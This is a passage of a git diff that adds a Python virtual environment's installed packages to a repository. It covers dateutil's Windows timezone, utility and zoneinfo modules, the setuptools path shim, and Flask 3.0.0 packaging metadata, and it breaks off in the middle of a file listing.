TZKEYNAMENT).Close() + TZKEYNAME = TZKEYNAMENT + except WindowsError: + TZKEYNAME = TZKEYNAME9X + handle.Close() + return TZKEYNAME + + +TZKEYNAME = _settzkeyname() + + +class tzres(object): + """ + Class for accessing ``tzres.dll``, which contains timezone name related + resources. + + .. versionadded:: 2.5.0 + """ + p_wchar = ctypes.POINTER(wintypes.WCHAR) # Pointer to a wide char + + def __init__(self, tzres_loc='tzres.dll'): + # Load the user32 DLL so we can load strings from tzres + user32 = ctypes.WinDLL('user32') + + # Specify the LoadStringW function + user32.LoadStringW.argtypes = (wintypes.HINSTANCE, + wintypes.UINT, + wintypes.LPWSTR, + ctypes.c_int) + + self.LoadStringW = user32.LoadStringW + self._tzres = ctypes.WinDLL(tzres_loc) + self.tzres_loc = tzres_loc + + def load_name(self, offset): + """ + Load a timezone name from a DLL offset (integer). + + >>> from dateutil.tzwin import tzres + >>> tzr = tzres() + >>> print(tzr.load_name(112)) + 'Eastern Standard Time' + + :param offset: + A positive integer value referring to a string from the tzres dll. + + .. note:: + + Offsets found in the registry are generally of the form + ``@tzres.dll,-114``. The offset in this case is 114, not -114. + + """ + resource = self.p_wchar() + lpBuffer = ctypes.cast(ctypes.byref(resource), wintypes.LPWSTR) + nchar = self.LoadStringW(self._tzres._handle, offset, lpBuffer, 0) + return resource[:nchar] + + def name_from_string(self, tzname_str): + """ + Parse strings as returned from the Windows registry into the time zone + name as defined in the registry. + + >>> from dateutil.tzwin import tzres + >>> tzr = tzres() + >>> print(tzr.name_from_string('@tzres.dll,-251')) + 'Dateline Daylight Time' + >>> print(tzr.name_from_string('Eastern Standard Time')) + 'Eastern Standard Time' + + :param tzname_str: + A timezone name string as returned from a Windows registry key. + + :return: + Returns the localized timezone string from tzres.dll if the string + is of the form `@tzres.dll,-offset`, else returns the input string. + """ + if not tzname_str.startswith('@'): + return tzname_str + + name_splt = tzname_str.split(',-') + try: + offset = int(name_splt[1]) + except: + raise ValueError("Malformed timezone string.") + + return self.load_name(offset) + + +class tzwinbase(tzrangebase): + """tzinfo class based on win32's timezones available in the registry.""" + def __init__(self): + raise NotImplementedError('tzwinbase is an abstract base class') + + def __eq__(self, other): + # Compare on all relevant dimensions, including name. + if not isinstance(other, tzwinbase): + return NotImplemented + + return (self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset and + self._stddayofweek == other._stddayofweek and + self._dstdayofweek == other._dstdayofweek and + self._stdweeknumber == other._stdweeknumber and + self._dstweeknumber == other._dstweeknumber and + self._stdhour == other._stdhour and + self._dsthour == other._dsthour and + self._stdminute == other._stdminute and + self._dstminute == other._dstminute and + self._std_abbr == other._std_abbr and + self._dst_abbr == other._dst_abbr) + + @staticmethod + def list(): + """Return a list of all time zones known to the system.""" + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + with winreg.OpenKey(handle, TZKEYNAME) as tzkey: + result = [winreg.EnumKey(tzkey, i) + for i in range(winreg.QueryInfoKey(tzkey)[0])] + return result + + def display(self): + """ + Return the display name of the time zone. + """ + return self._display + + def transitions(self, year): + """ + For a given year, get the DST on and off transition times, expressed + always on the standard time side. For zones with no transitions, this + function returns ``None``. + + :param year: + The year whose transitions you would like to query. + + :return: + Returns a :class:`tuple` of :class:`datetime.datetime` objects, + ``(dston, dstoff)`` for zones with an annual DST transition, or + ``None`` for fixed offset zones. + """ + + if not self.hasdst: + return None + + dston = picknthweekday(year, self._dstmonth, self._dstdayofweek, + self._dsthour, self._dstminute, + self._dstweeknumber) + + dstoff = picknthweekday(year, self._stdmonth, self._stddayofweek, + self._stdhour, self._stdminute, + self._stdweeknumber) + + # Ambiguous dates default to the STD side + dstoff -= self._dst_base_offset + + return dston, dstoff + + def _get_hasdst(self): + return self._dstmonth != 0 + + @property + def _dst_base_offset(self): + return self._dst_base_offset_ + + +class tzwin(tzwinbase): + """ + Time zone object created from the zone info in the Windows registry + + These are similar to :py:class:`dateutil.tz.tzrange` objects in that + the time zone data is provided in the format of a single offset rule + for either 0 or 2 time zone transitions per year. + + :param: name + The name of a Windows time zone key, e.g. "Eastern Standard Time". + The full list of keys can be retrieved with :func:`tzwin.list`. + """ + + def __init__(self, name): + self._name = name + + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + tzkeyname = text_type("{kn}\\{name}").format(kn=TZKEYNAME, name=name) + with winreg.OpenKey(handle, tzkeyname) as tzkey: + keydict = valuestodict(tzkey) + + self._std_abbr = keydict["Std"] + self._dst_abbr = keydict["Dlt"] + + self._display = keydict["Display"] + + # See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm + tup = struct.unpack("=3l16h", keydict["TZI"]) + stdoffset = -tup[0]-tup[1] # Bias + StandardBias * -1 + dstoffset = stdoffset-tup[2] # + DaylightBias * -1 + self._std_offset = datetime.timedelta(minutes=stdoffset) + self._dst_offset = datetime.timedelta(minutes=dstoffset) + + # for the meaning see the win32 TIME_ZONE_INFORMATION structure docs + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms725481(v=vs.85).aspx + (self._stdmonth, + self._stddayofweek, # Sunday = 0 + self._stdweeknumber, # Last = 5 + self._stdhour, + self._stdminute) = tup[4:9] + + (self._dstmonth, + self._dstdayofweek, # Sunday = 0 + self._dstweeknumber, # Last = 5 + self._dsthour, + self._dstminute) = tup[12:17] + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = self._get_hasdst() + + def __repr__(self): + return "tzwin(%s)" % repr(self._name) + + def __reduce__(self): + return (self.__class__, (self._name,)) + + +class tzwinlocal(tzwinbase): + """ + Class representing the local time zone information in the Windows registry + + While :class:`dateutil.tz.tzlocal` makes system calls (via the :mod:`time` + module) to retrieve time zone information, ``tzwinlocal`` retrieves the + rules directly from the Windows registry and creates an object like + :class:`dateutil.tz.tzwin`. + + Because Windows does not have an equivalent of :func:`time.tzset`, on + Windows, :class:`dateutil.tz.tzlocal` instances will always reflect the + time zone settings *at the time that the process was started*, meaning + changes to the machine's time zone settings during the run of a program + on Windows will **not** be reflected by :class:`dateutil.tz.tzlocal`. + Because ``tzwinlocal`` reads the registry directly, it is unaffected by + this issue. + """ + def __init__(self): + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + with winreg.OpenKey(handle, TZLOCALKEYNAME) as tzlocalkey: + keydict = valuestodict(tzlocalkey) + + self._std_abbr = keydict["StandardName"] + self._dst_abbr = keydict["DaylightName"] + + try: + tzkeyname = text_type('{kn}\\{sn}').format(kn=TZKEYNAME, + sn=self._std_abbr) + with winreg.OpenKey(handle, tzkeyname) as tzkey: + _keydict = valuestodict(tzkey) + self._display = _keydict["Display"] + except OSError: + self._display = None + + stdoffset = -keydict["Bias"]-keydict["StandardBias"] + dstoffset = stdoffset-keydict["DaylightBias"] + + self._std_offset = datetime.timedelta(minutes=stdoffset) + self._dst_offset = datetime.timedelta(minutes=dstoffset) + + # For reasons unclear, in this particular key, the day of week has been + # moved to the END of the SYSTEMTIME structure. + tup = struct.unpack("=8h", keydict["StandardStart"]) + + (self._stdmonth, + self._stdweeknumber, # Last = 5 + self._stdhour, + self._stdminute) = tup[1:5] + + self._stddayofweek = tup[7] + + tup = struct.unpack("=8h", keydict["DaylightStart"]) + + (self._dstmonth, + self._dstweeknumber, # Last = 5 + self._dsthour, + self._dstminute) = tup[1:5] + + self._dstdayofweek = tup[7] + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = self._get_hasdst() + + def __repr__(self): + return "tzwinlocal()" + + def __str__(self): + # str will return the standard name, not the daylight name. + return "tzwinlocal(%s)" % repr(self._std_abbr) + + def __reduce__(self): + return (self.__class__, ()) + + +def picknthweekday(year, month, dayofweek, hour, minute, whichweek): + """ dayofweek == 0 means Sunday, whichweek 5 means last instance """ + first = datetime.datetime(year, month, 1, hour, minute) + + # This will work if dayofweek is ISO weekday (1-7) or Microsoft-style (0-6), + # Because 7 % 7 = 0 + weekdayone = first.replace(day=((dayofweek - first.isoweekday()) % 7) + 1) + wd = weekdayone + ((whichweek - 1) * ONEWEEK) + if (wd.month != month): + wd -= ONEWEEK + + return wd + + +def valuestodict(key): + """Convert a registry key's values to a dictionary.""" + dout = {} + size = winreg.QueryInfoKey(key)[1] + tz_res = None + + for i in range(size): + key_name, value, dtype = winreg.EnumValue(key, i) + if dtype == winreg.REG_DWORD or dtype == winreg.REG_DWORD_LITTLE_ENDIAN: + # If it's a DWORD (32-bit integer), it's stored as unsigned - convert + # that to a proper signed integer + if value & (1 << 31): + value = value - (1 << 32) + elif dtype == winreg.REG_SZ: + # If it's a reference to the tzres DLL, load the actual string + if value.startswith('@tzres'): + tz_res = tz_res or tzres() + value = tz_res.name_from_string(value) + + value = value.rstrip('\x00') # Remove trailing nulls + + dout[key_name] = value + + return dout diff --git a/env/Lib/site-packages/dateutil/tzwin.py b/env/Lib/site-packages/dateutil/tzwin.py new file mode 100644 index 00000000..cebc673e --- /dev/null +++ b/env/Lib/site-packages/dateutil/tzwin.py @@ -0,0 +1,2 @@ +# tzwin has moved to dateutil.tz.win +from .tz.win import * diff --git a/env/Lib/site-packages/dateutil/utils.py b/env/Lib/site-packages/dateutil/utils.py new file mode 100644 index 00000000..dd2d245a --- /dev/null +++ b/env/Lib/site-packages/dateutil/utils.py @@ -0,0 +1,71 @@ +# -*- coding: utf-8 -*- +""" +This module offers general convenience and utility functions for dealing with +datetimes. + +.. versionadded:: 2.7.0 +""" +from __future__ import unicode_literals + +from datetime import datetime, time + + +def today(tzinfo=None): + """ + Returns a :py:class:`datetime` representing the current day at midnight + + :param tzinfo: + The time zone to attach (also used to determine the current day). + + :return: + A :py:class:`datetime.datetime` object representing the current day + at midnight. + """ + + dt = datetime.now(tzinfo) + return datetime.combine(dt.date(), time(0, tzinfo=tzinfo)) + + +def default_tzinfo(dt, tzinfo): + """ + Sets the ``tzinfo`` parameter on naive datetimes only + + This is useful for example when you are provided a datetime that may have + either an implicit or explicit time zone, such as when parsing a time zone + string. + + .. doctest:: + + >>> from dateutil.tz import tzoffset + >>> from dateutil.parser import parse + >>> from dateutil.utils import default_tzinfo + >>> dflt_tz = tzoffset("EST", -18000) + >>> print(default_tzinfo(parse('2014-01-01 12:30 UTC'), dflt_tz)) + 2014-01-01 12:30:00+00:00 + >>> print(default_tzinfo(parse('2014-01-01 12:30'), dflt_tz)) + 2014-01-01 12:30:00-05:00 + + :param dt: + The datetime on which to replace the time zone + + :param tzinfo: + The :py:class:`datetime.tzinfo` subclass instance to assign to + ``dt`` if (and only if) it is naive. + + :return: + Returns an aware :py:class:`datetime.datetime`. + """ + if dt.tzinfo is not None: + return dt + else: + return dt.replace(tzinfo=tzinfo) + + +def within_delta(dt1, dt2, delta): + """ + Useful for comparing two datetimes that may have a negligible difference + to be considered equal. + """ + delta = abs(delta) + difference = dt1 - dt2 + return -delta <= difference <= delta diff --git a/env/Lib/site-packages/dateutil/zoneinfo/__init__.py b/env/Lib/site-packages/dateutil/zoneinfo/__init__.py new file mode 100644 index 00000000..34f11ad6 --- /dev/null +++ b/env/Lib/site-packages/dateutil/zoneinfo/__init__.py @@ -0,0 +1,167 @@ +# -*- coding: utf-8 -*- +import warnings +import json + +from tarfile import TarFile +from pkgutil import get_data +from io import BytesIO + +from dateutil.tz import tzfile as _tzfile + +__all__ = ["get_zonefile_instance", "gettz", "gettz_db_metadata"] + +ZONEFILENAME = "dateutil-zoneinfo.tar.gz" +METADATA_FN = 'METADATA' + + +class tzfile(_tzfile): + def __reduce__(self): + return (gettz, (self._filename,)) + + +def getzoneinfofile_stream(): + try: + return BytesIO(get_data(__name__, ZONEFILENAME)) + except IOError as e: # TODO switch to FileNotFoundError? + warnings.warn("I/O error({0}): {1}".format(e.errno, e.strerror)) + return None + + +class ZoneInfoFile(object): + def __init__(self, zonefile_stream=None): + if zonefile_stream is not None: + with TarFile.open(fileobj=zonefile_stream) as tf: + self.zones = {zf.name: tzfile(tf.extractfile(zf), filename=zf.name) + for zf in tf.getmembers() + if zf.isfile() and zf.name != METADATA_FN} + # deal with links: They'll point to their parent object. Less + # waste of memory + links = {zl.name: self.zones[zl.linkname] + for zl in tf.getmembers() if + zl.islnk() or zl.issym()} + self.zones.update(links) + try: + metadata_json = tf.extractfile(tf.getmember(METADATA_FN)) + metadata_str = metadata_json.read().decode('UTF-8') + self.metadata = json.loads(metadata_str) + except KeyError: + # no metadata in tar file + self.metadata = None + else: + self.zones = {} + self.metadata = None + + def get(self, name, default=None): + """ + Wrapper for :func:`ZoneInfoFile.zones.get`. This is a convenience method + for retrieving zones from the zone dictionary. + + :param name: + The name of the zone to retrieve. (Generally IANA zone names) + + :param default: + The value to return in the event of a missing key. + + .. versionadded:: 2.6.0 + + """ + return self.zones.get(name, default) + + +# The current API has gettz as a module function, although in fact it taps into +# a stateful class. So as a workaround for now, without changing the API, we +# will create a new "global" class instance the first time a user requests a +# timezone. Ugly, but adheres to the api. +# +# TODO: Remove after deprecation period. +_CLASS_ZONE_INSTANCE = [] + + +def get_zonefile_instance(new_instance=False): + """ + This is a convenience function which provides a :class:`ZoneInfoFile` + instance using the data provided by the ``dateutil`` package. By default, it + caches a single instance of the ZoneInfoFile object and returns that. + + :param new_instance: + If ``True``, a new instance of :class:`ZoneInfoFile` is instantiated and + used as the cached instance for the next call. Otherwise, new instances + are created only as necessary. + + :return: + Returns a :class:`ZoneInfoFile` object. + + .. versionadded:: 2.6 + """ + if new_instance: + zif = None + else: + zif = getattr(get_zonefile_instance, '_cached_instance', None) + + if zif is None: + zif = ZoneInfoFile(getzoneinfofile_stream()) + + get_zonefile_instance._cached_instance = zif + + return zif + + +def gettz(name): + """ + This retrieves a time zone from the local zoneinfo tarball that is packaged + with dateutil. + + :param name: + An IANA-style time zone name, as found in the zoneinfo file. + + :return: + Returns a :class:`dateutil.tz.tzfile` time zone object. + + .. warning:: + It is generally inadvisable to use this function, and it is only + provided for API compatibility with earlier versions. This is *not* + equivalent to ``dateutil.tz.gettz()``, which selects an appropriate + time zone based on the inputs, favoring system zoneinfo. This is ONLY + for accessing the dateutil-specific zoneinfo (which may be out of + date compared to the system zoneinfo). + + .. deprecated:: 2.6 + If you need to use a specific zoneinfofile over the system zoneinfo, + instantiate a :class:`dateutil.zoneinfo.ZoneInfoFile` object and call + :func:`dateutil.zoneinfo.ZoneInfoFile.get(name)` instead. + + Use :func:`get_zonefile_instance` to retrieve an instance of the + dateutil-provided zoneinfo. + """ + warnings.warn("zoneinfo.gettz() will be removed in future versions, " + "to use the dateutil-provided zoneinfo files, instantiate a " + "ZoneInfoFile object and use ZoneInfoFile.zones.get() " + "instead. See the documentation for details.", + DeprecationWarning) + + if len(_CLASS_ZONE_INSTANCE) == 0: + _CLASS_ZONE_INSTANCE.append(ZoneInfoFile(getzoneinfofile_stream())) + return _CLASS_ZONE_INSTANCE[0].zones.get(name) + + +def gettz_db_metadata(): + """ Get the zonefile metadata + + See `zonefile_metadata`_ + + :returns: + A dictionary with the database metadata + + .. deprecated:: 2.6 + See deprecation warning in :func:`zoneinfo.gettz`. To get metadata, + query the attribute ``zoneinfo.ZoneInfoFile.metadata``. + """ + warnings.warn("zoneinfo.gettz_db_metadata() will be removed in future " + "versions, to use the dateutil-provided zoneinfo files, " + "ZoneInfoFile object and query the 'metadata' attribute " + "instead. See the documentation for details.", + DeprecationWarning) + + if len(_CLASS_ZONE_INSTANCE) == 0: + _CLASS_ZONE_INSTANCE.append(ZoneInfoFile(getzoneinfofile_stream())) + return _CLASS_ZONE_INSTANCE[0].metadata diff --git a/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz b/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz new file mode 100644 index 00000000..524c48e1 Binary files /dev/null and b/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz differ diff --git a/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py b/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py new file mode 100644 index 00000000..684c6586 --- /dev/null +++ b/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py @@ -0,0 +1,75 @@ +import logging +import os +import tempfile +import shutil +import json +from subprocess import check_call, check_output +from tarfile import TarFile + +from dateutil.zoneinfo import METADATA_FN, ZONEFILENAME + + +def rebuild(filename, tag=None, format="gz", zonegroups=[], metadata=None): + """Rebuild the internal timezone info in dateutil/zoneinfo/zoneinfo*tar* + + filename is the timezone tarball from ``ftp.iana.org/tz``. + + """ + tmpdir = tempfile.mkdtemp() + zonedir = os.path.join(tmpdir, "zoneinfo") + moduledir = os.path.dirname(__file__) + try: + with TarFile.open(filename) as tf: + for name in zonegroups: + tf.extract(name, tmpdir) + filepaths = [os.path.join(tmpdir, n) for n in zonegroups] + + _run_zic(zonedir, filepaths) + + # write metadata file + with open(os.path.join(zonedir, METADATA_FN), 'w') as f: + json.dump(metadata, f, indent=4, sort_keys=True) + target = os.path.join(moduledir, ZONEFILENAME) + with TarFile.open(target, "w:%s" % format) as tf: + for entry in os.listdir(zonedir): + entrypath = os.path.join(zonedir, entry) + tf.add(entrypath, entry) + finally: + shutil.rmtree(tmpdir) + + +def _run_zic(zonedir, filepaths): + """Calls the ``zic`` compiler in a compatible way to get a "fat" binary. + + Recent versions of ``zic`` default to ``-b slim``, while older versions + don't even have the ``-b`` option (but default to "fat" binaries). The + current version of dateutil does not support Version 2+ TZif files, which + causes problems when used in conjunction with "slim" binaries, so this + function is used to ensure that we always get a "fat" binary. + """ + + try: + help_text = check_output(["zic", "--help"]) + except OSError as e: + _print_on_nosuchfile(e) + raise + + if b"-b " in help_text: + bloat_args = ["-b", "fat"] + else: + bloat_args = [] + + check_call(["zic"] + bloat_args + ["-d", zonedir] + filepaths) + + +def _print_on_nosuchfile(e): + """Print helpful troubleshooting message + + e is an exception raised by subprocess.check_call() + + """ + if e.errno == 2: + logging.error( + "Could not find zic. Perhaps you need to install " + "libc-bin or some other package that provides it, " + "or it's not in your PATH?") diff --git a/env/Lib/site-packages/distutils-precedence.pth b/env/Lib/site-packages/distutils-precedence.pth new file mode 100644 index 00000000..6de4198f --- /dev/null +++ b/env/Lib/site-packages/distutils-precedence.pth @@ -0,0 +1 @@ +import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'stdlib') == 'local'; enabled and __import__('_distutils_hack').add_shim(); diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER b/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst b/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst new file mode 100644 index 00000000..9d227a0c --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2010 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA b/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA new file mode 100644 index 00000000..b802e937 --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA @@ -0,0 +1,116 @@ +Metadata-Version: 2.1 +Name: Flask +Version: 3.0.0 +Summary: A simple framework for building complex web applications. +Maintainer-email: Pallets +Requires-Python: >=3.8 +Description-Content-Type: text/x-rst +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Framework :: Flask +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Internet :: WWW/HTTP :: WSGI +Classifier: Topic :: Internet :: WWW/HTTP :: WSGI :: Application +Classifier: Topic :: Software Development :: Libraries :: Application Frameworks +Requires-Dist: Werkzeug>=3.0.0 +Requires-Dist: Jinja2>=3.1.2 +Requires-Dist: itsdangerous>=2.1.2 +Requires-Dist: click>=8.1.3 +Requires-Dist: blinker>=1.6.2 +Requires-Dist: importlib-metadata>=3.6.0; python_version < '3.10' +Requires-Dist: asgiref>=3.2 ; extra == "async" +Requires-Dist: python-dotenv ; extra == "dotenv" +Project-URL: Changes, https://flask.palletsprojects.com/changes/ +Project-URL: Chat, https://discord.gg/pallets +Project-URL: Documentation, https://flask.palletsprojects.com/ +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Issue Tracker, https://github.com/pallets/flask/issues/ +Project-URL: Source Code, https://github.com/pallets/flask/ +Provides-Extra: async +Provides-Extra: dotenv + +Flask +===== + +Flask is a lightweight `WSGI`_ web application framework. It is designed +to make getting started quick and easy, with the ability to scale up to +complex applications. It began as a simple wrapper around `Werkzeug`_ +and `Jinja`_ and has become one of the most popular Python web +application frameworks. + +Flask offers suggestions, but doesn't enforce any dependencies or +project layout. It is up to the developer to choose the tools and +libraries they want to use. There are many extensions provided by the +community that make adding new functionality easy. + +.. _WSGI: https://wsgi.readthedocs.io/ +.. _Werkzeug: https://werkzeug.palletsprojects.com/ +.. _Jinja: https://jinja.palletsprojects.com/ + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U Flask + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +.. code-block:: python + + # save this as app.py + from flask import Flask + + app = Flask(__name__) + + @app.route("/") + def hello(): + return "Hello, World!" + +.. code-block:: text + + $ flask run + * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) + + +Contributing +------------ + +For guidance on setting up a development environment and how to make a +contribution to Flask, see the `contributing guidelines`_. + +.. _contributing guidelines: https://github.com/pallets/flask/blob/main/CONTRIBUTING.rst + + +Donate +------ + +The Pallets organization develops and supports Flask and the libraries +it uses. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +.. _please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://flask.palletsprojects.com/ +- Changes: https://flask.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/Flask/ +- Source Code: https://github.com/pallets/flask/ +- Issue Tracker: https://github.com/pallets/flask/issues/ +- Chat: https://discord.gg/pallets + diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD b/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD new file mode 100644 index 00000000..57f2cf3e --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD @@ -0,0 +1,58 @@ +../../Scripts/flask.exe,sha256=WAGVUGNkzglb7Kjx5pR-KpHnvJq3jMk7Uv5d70pN5nM,97161 +flask-3.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +flask-3.0.0.dist-info/LICENSE.rst,sha256=SJqOEQhQntmKN7uYPhHg9-HTHwvY-Zp5yESOf_N9B-o,1475 +flask-3.0.0.dist-info/METADATA,sha256=02XP69VTiwn5blcRgHcyuSQ2cLTuJFV8FXw2x4QnxKo,3588 +flask-3.0.0.dist-info/RECORD,, +flask-3.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +flask-3.0.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81 +flask-3.0.0.dist-info/entry_points.txt,sha256=bBP7hTOS5fz9zLtC7sPofBZAlMkEvBxu7KqS6l5lvc4,40 +flask/__init__.py,sha256=6xMqdVA0FIQ2U1KVaGX3lzNCdXPzoHPaa0hvQCNcfSk,2625 +flask/__main__.py,sha256=bYt9eEaoRQWdejEHFD8REx9jxVEdZptECFsV7F49Ink,30 +flask/__pycache__/__init__.cpython-310.pyc,, +flask/__pycache__/__main__.cpython-310.pyc,, +flask/__pycache__/app.cpython-310.pyc,, +flask/__pycache__/blueprints.cpython-310.pyc,, +flask/__pycache__/cli.cpython-310.pyc,, +flask/__pycache__/config.cpython-310.pyc,, +flask/__pycache__/ctx.cpython-310.pyc,, +flask/__pycache__/debughelpers.cpython-310.pyc,, +flask/__pycache__/globals.cpython-310.pyc,, +flask/__pycache__/helpers.cpython-310.pyc,, +flask/__pycache__/logging.cpython-310.pyc,, +flask/__pycache__/sessions.cpython-310.pyc,, +flask/__pycache__/signals.cpython-310.pyc,, +flask/__pycache__/templating.cpython-310.pyc,, +flask/__pycache__/testing.cpython-310.pyc,, +flask/__pycache__/typing.cpython-310.pyc,, +flask/__pycache__/views.cpython-310.pyc,, +flask/__pycache__/wrappers.cpython-310.pyc,, +flask/app.py,sha256=voUkc9xk9B039AhVrU21GDpsQ6wqrr-NobqLx8fURfQ,59201 +flask/blueprints.py,sha256=zO8bLO9Xy1aVD92bDmzihutjVEXf8xdDaVfiy7c--Ck,3129 +flask/cli.py,sha256=PDwZCfPagi5GUzb-D6dEN7y20gWiVAg3ejRnxBKNHPA,33821 +flask/config.py,sha256=YZSZ-xpFj1iW1B1Kj1iDhpc5s7pHncloiRLqXhsU7Hs,12856 +flask/ctx.py,sha256=x2kGzUXtPzVyi2YSKrU_PV1AvtxTmh2iRdriJRTSPGM,14841 +flask/debughelpers.py,sha256=WKzD2FNTSimNSwCJVLr9_fFo1f2VlTWB5EZ6lmR5bwE,5548 +flask/globals.py,sha256=XdQZmStBmPIs8t93tjx6pO7Bm3gobAaONWkFcUHaGas,1713 +flask/helpers.py,sha256=ynEoMB7fdF5Y1P-ngxMjZDZWfrJ4St-9OGZZsTcUwx8,22992 +flask/json/__init__.py,sha256=pdtpoK2b0b1u7Sxbx3feM7VWhsI20l1yGAvbYWxaxvc,5572 +flask/json/__pycache__/__init__.cpython-310.pyc,, +flask/json/__pycache__/provider.cpython-310.pyc,, +flask/json/__pycache__/tag.cpython-310.pyc,, +flask/json/provider.py,sha256=VBKSK75t3OsTvZ3N10B3Fsu7-NdpfrGYcl41goQJ3q8,7640 +flask/json/tag.py,sha256=ihb7QWrNEr0YC3KD4TolZbftgSPCuLk7FAvK49huYC0,8871 +flask/logging.py,sha256=VcdJgW4Axm5l_-7vXLQjRTL0eckaMks7Ya_HaoDm0wg,2330 +flask/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +flask/sansio/README.md,sha256=-0X1tECnilmz1cogx-YhNw5d7guK7GKrq_DEV2OzlU0,228 +flask/sansio/__pycache__/app.cpython-310.pyc,, +flask/sansio/__pycache__/blueprints.cpython-310.pyc,, +flask/sansio/__pycache__/scaffold.cpython-310.pyc,, +flask/sansio/app.py,sha256=nZWCFMOW8qK95Ck9UvDzxvswQr-coLJhIFaa_OVobCc,37977 +flask/sansio/blueprints.py,sha256=caskVI1Zf3mM5msevK5-tWy3VqX_A8mlB0KGNyRx5_0,24319 +flask/sansio/scaffold.py,sha256=-Cus0cVS4PmLof4qLvfjSQzk4AKsLqPR6LBpv6ALw3Y,30580 +flask/sessions.py,sha256=rFH2QKXG24dEazkKGxAHqUpAUh_30hDHrddhVYgAcY0,14169 +flask/signals.py,sha256=V7lMUww7CqgJ2ThUBn1PiatZtQanOyt7OZpu2GZI-34,750 +flask/templating.py,sha256=EtL8CE5z2aefdR1I-TWYVNg0cSuXBqz_lvOGKeggktk,7538 +flask/testing.py,sha256=h7AinggrMgGzKlDN66VfB0JjWW4Z1U_OD6FyjqBNiYM,10017 +flask/typing.py,sha256=2pGlhSaZqJVJOoh-QdH-20QVzl2r-zLXyP8otXfCCs4,3156 +flask/views.py,sha256=V5hOGZLx0Bn99QGcM6mh5x_uM-MypVT0-RysEFU84jc,6789 +flask/wrappers.py,sha256=PhMp3teK3SnEmIdog59cO_DHiZ9Btn0qI1EifrTdwP8,5709 diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/REQUESTED b/env/Lib/site-packages/flask-3.0.0.dist-info/REQUESTED new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL b/env/Lib/site-packages/flask-3.0.0.dist-info/WHEEL new file mode 100644 index 00000000..3b5e64b5 --- /dev/null +++ 